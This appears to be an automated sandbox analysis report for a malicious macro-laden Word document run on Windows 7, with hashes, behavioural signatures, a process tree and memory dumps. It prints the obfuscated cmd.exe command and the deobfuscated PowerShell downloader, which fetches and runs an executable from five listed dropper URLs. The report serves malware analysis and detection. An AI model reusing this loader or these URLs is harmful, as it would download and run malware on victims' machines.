Overview

overview

10

Static

static

8

6acfc827bf...18.doc

windows7-x64

10

6acfc827bf...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 11:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6acfc827bf70cfd4fc9cd36f66ebba6c_JaffaCakes118.doc

  • Size

    124KB

  • MD5

    6acfc827bf70cfd4fc9cd36f66ebba6c

  • SHA1

    cb32b63048a1368cceb3a2114ca6fe640ee440cd

  • SHA256

    fbb1873ef58fdcc8f875e6450150e7a378e86deb32cb3525fd23d3791bf192ad

  • SHA512

    08fe27514c28daaaa5278ab990f84a0ceaf3075eda9d157f01739de20574a30e811b610c84a0e51cc011c875005411f041d6feabf6601895c04a5738505232ec

  • SSDEEP

    1536:nptJlmrJpmxlRw99NBc+aSwT+75RnuwACdRR2XGUggBlpF7xpy7RMANuk:pte2dw99fVtRIWwYMKuk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hollywoodgossip.biz/GpyDtTIIO1
exe.dropper

http://charpentier-couvreur-gironde.com/2Agu5kOrh7
exe.dropper

http://surprise-dj-team.com/2Atuefrxm
exe.dropper

http://spektramaxima.com/IXx8GGy
exe.dropper

http://dc.amegt.com/wp-content/QNhKWYE

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6acfc827bf70cfd4fc9cd36f66ebba6c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1284
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V/C"^s^e^t ^2Cv=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^};^k^aerb;^a^G^P^$^ ^m^e^t^I^-^ekovn^I^;)^a^G^P^$^ ^,^J^P^G^$(e^l^i^F^d^ao^ln^w^o^D^.^J^A^h^$^{^yr^t^{)^kR^a^$^ n^i^ ^JP^G^$(^hc^a^er^o^f^;'^e^x^e^.^'^+^u^i^p^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$^=^a^G^P^$^;^'^5^2^7^'^ ^=^ ^u^i^p^$^;)'^@^'(^t^i^l^p^S.^'E^Y^W^K^hN^Q/^tn^e^tn^oc^-^p^w/^m^oc^.^tg^e^m^a^.c^d//^:^p^t^t^h^@^y^G^G^8^x^X^I/^moc^.^a^m^i^x^a^m^ar^tke^ps//^:^p^t^t^h^@^m^xr^f^e^u^t^A^2/^m^oc^.^m^a^e^t^-^j^d^-^e^s^ir^pr^u^s//^:^p^t^t^h^@^7^hr^Ok^5^u^g^A^2/^m^oc^.^e^dn^or^i^g^-r^u^erv^u^oc^-r^e^i^tn^e^pr^a^hc//^:^p^t^t^h^@^1^O^I^I^Tt^D^y^p^G/^z^i^b^.^p^i^s^s^o^g^d^o^ow^y^l^l^o^h//:p^t^t^h^'^=kR^a^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^J^A^h^$^ ^l^l^e^h^sr^e^w^o^p&&^f^or /^L %^3 in (^4^0^8^,^-^1^,^0)^d^o ^s^e^t n^b^T^z=!n^b^T^z!!^2Cv:~%^3,1!&&^i^f %^3=^=^0 c^a^l^l %n^b^T^z:^*n^bT^z^!^=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $hAJ=new-object Net.WebClient;$aRk='http://hollywoodgossip.biz/GpyDtTIIO1@http://charpentier-couvreur-gironde.com/2Agu5kOrh7@http://surprise-dj-team.com/2Atuefrxm@http://spektramaxima.com/IXx8GGy@http://dc.amegt.com/wp-content/QNhKWYE'.Split('@');$piu = '725';$PGa=$env:public+'\'+$piu+'.exe';foreach($GPJ in $aRk){try{$hAJ.DownloadFile($GPJ, $PGa);Invoke-Item $PGa;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2388

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      4b994444859fc40053f13dd5b9f38f3f

      SHA1

      ebfdac7647cdfd7fe4fe729b9fa55f382a58f198

      SHA256

      0df29eac8c3b2b5e9ad335012a5dc225bb13538782a336734c676b4cecc9e70c

      SHA512

      c5302fcb86453cb8cd9727d47fc030bc928c17a23f8815f7567ebb7282578d7fcf3804e3b5dcb2fd242759158c170e1da06186286a16dd59e4b5f70831be983b

      Download Submit

    • memory/2164-13-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-9-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-10-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-8-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-25-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-24-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-20-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-17-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-6-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-0-0x000000002FBA1000-0x000000002FBA2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2164-59-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2164-2-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2164-16-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-26-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-7-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-12-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-40-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-39-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2164-43-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2164-58-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2388-34-0x0000000002DE0000-0x0000000002E1C000-memory.dmp

      Filesize

      240KB

      Download